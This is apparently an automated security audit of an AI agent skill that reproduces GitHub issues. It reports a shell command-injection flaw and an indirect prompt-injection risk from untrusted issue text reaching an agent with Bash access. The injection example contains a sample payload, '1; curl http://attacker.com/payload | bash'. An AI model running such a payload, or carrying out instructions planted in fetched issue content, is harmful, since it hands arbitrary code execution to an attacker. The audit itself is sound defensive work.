replicate-issue

Fail

Audited by Gen Agent Trust Hub on Apr 11, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION]: The skill directly incorporates the $ARGUMENTS variable (intended for the GitHub issue number) into multiple shell commands without any sanitization or escaping. Examples include gh issue view $ARGUMENTS and file paths for screenshots like /tmp/issue-$ARGUMENTS-{step-name}.png. A malicious user could provide an input like 1; curl http://attacker.com/payload | bash to execute arbitrary code on the underlying system.
  • [PROMPT_INJECTION]: The skill is vulnerable to Indirect Prompt Injection (Category 8).
    1. Ingestion points: The skill fetches external, untrusted content (title, body, comments) from GitHub issues in Phase 1.1.
    2. Boundary markers: There are no delimiters or specific instructions to the agent to treat the fetched content as untrusted data rather than instructions.
    3. Capability inventory: The skill possesses extensive system capabilities, including the Bash tool for command execution and the agent-browser for web automation.
    4. Sanitization: No validation or sanitization is performed on the retrieved GitHub content before it is used to generate a 'Test Plan' in Phase 1.2.
    An attacker could craft a GitHub issue containing malicious instructions that the agent would then faithfully execute as part of its reproduction workflow.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Apr 11, 2026, 10:40 PM